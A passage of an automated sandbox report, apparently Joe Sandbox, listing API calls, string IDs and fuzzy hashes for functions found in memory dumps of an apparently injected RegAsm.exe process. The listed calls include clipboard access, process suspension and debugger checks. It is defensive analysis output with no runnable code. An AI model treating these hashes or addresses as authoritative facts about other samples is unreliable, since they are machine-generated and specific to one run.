                                            • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateInfoParametersSystemValue
                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                          • API String ID: 4127273184-3576401099
                                          • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                          • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                          • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                          • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                          Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID: p'E$JD
                                          • API String ID: 1084509184-908320845
                                          • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                          • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                          • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                          • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                          Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                          • String ID:
                                          • API String ID: 2829624132-0
                                          • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                          • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                          • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                          • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                          Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                          • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                          • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                          • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                          Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                          • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                          • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                          • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                          Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                          • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                          • ExitProcess.KERNEL32 ref: 0044338F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                          • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                          • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                          • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                          Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                          • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                          • ExitProcess.KERNEL32 ref: 10004AEE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                          • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                          • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                          • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                          Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$CloseDataOpen
                                          • String ID:
                                          • API String ID: 2058664381-0
                                          • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                          • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                          • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                          • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                          Function 0041BBC6 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                          • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                          • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseHandleOpenResume
                                          • String ID:
                                          • API String ID: 3614150671-0
                                          • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                          • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                          • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                          • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                          Function 0041BB9A Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                          • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseHandleOpenSuspend
                                          • String ID:
                                          • API String ID: 1999457699-0
                                          • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                          • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                          • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                          • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                          Function 00434CB6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FeaturePresentProcessor
                                          • String ID: MZ@
                                          • API String ID: 2325560087-2978689999
                                          • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                          • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                          • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                          • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                          Function 0044E8F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                          • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                          • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                          • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                          Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                          • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                          • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                          • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                          Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID: JD
                                          • API String ID: 1084509184-2669065882
                                          • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                          • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                          • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                          • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                          Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: GetLocaleInfoEx
                                          • API String ID: 2299586839-2904428671
                                          • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                          • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                          • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                          • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                          Function 00451D58 Relevance: 3.2, APIs: 2, Instructions: 236COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                          • String ID:
                                          • API String ID: 1661935332-0
                                          • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                          • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                          • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                          • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                          Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                          • String ID:
                                          • API String ID: 1663032902-0
                                          • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                          • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                          • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                          • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                          Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale_abort_free
                                          • String ID:
                                          • API String ID: 2692324296-0
                                          • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                          • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                          • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                          • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                          Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                          • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                          • String ID:
                                          • API String ID: 1272433827-0
                                          • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                          • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                          • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                          • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
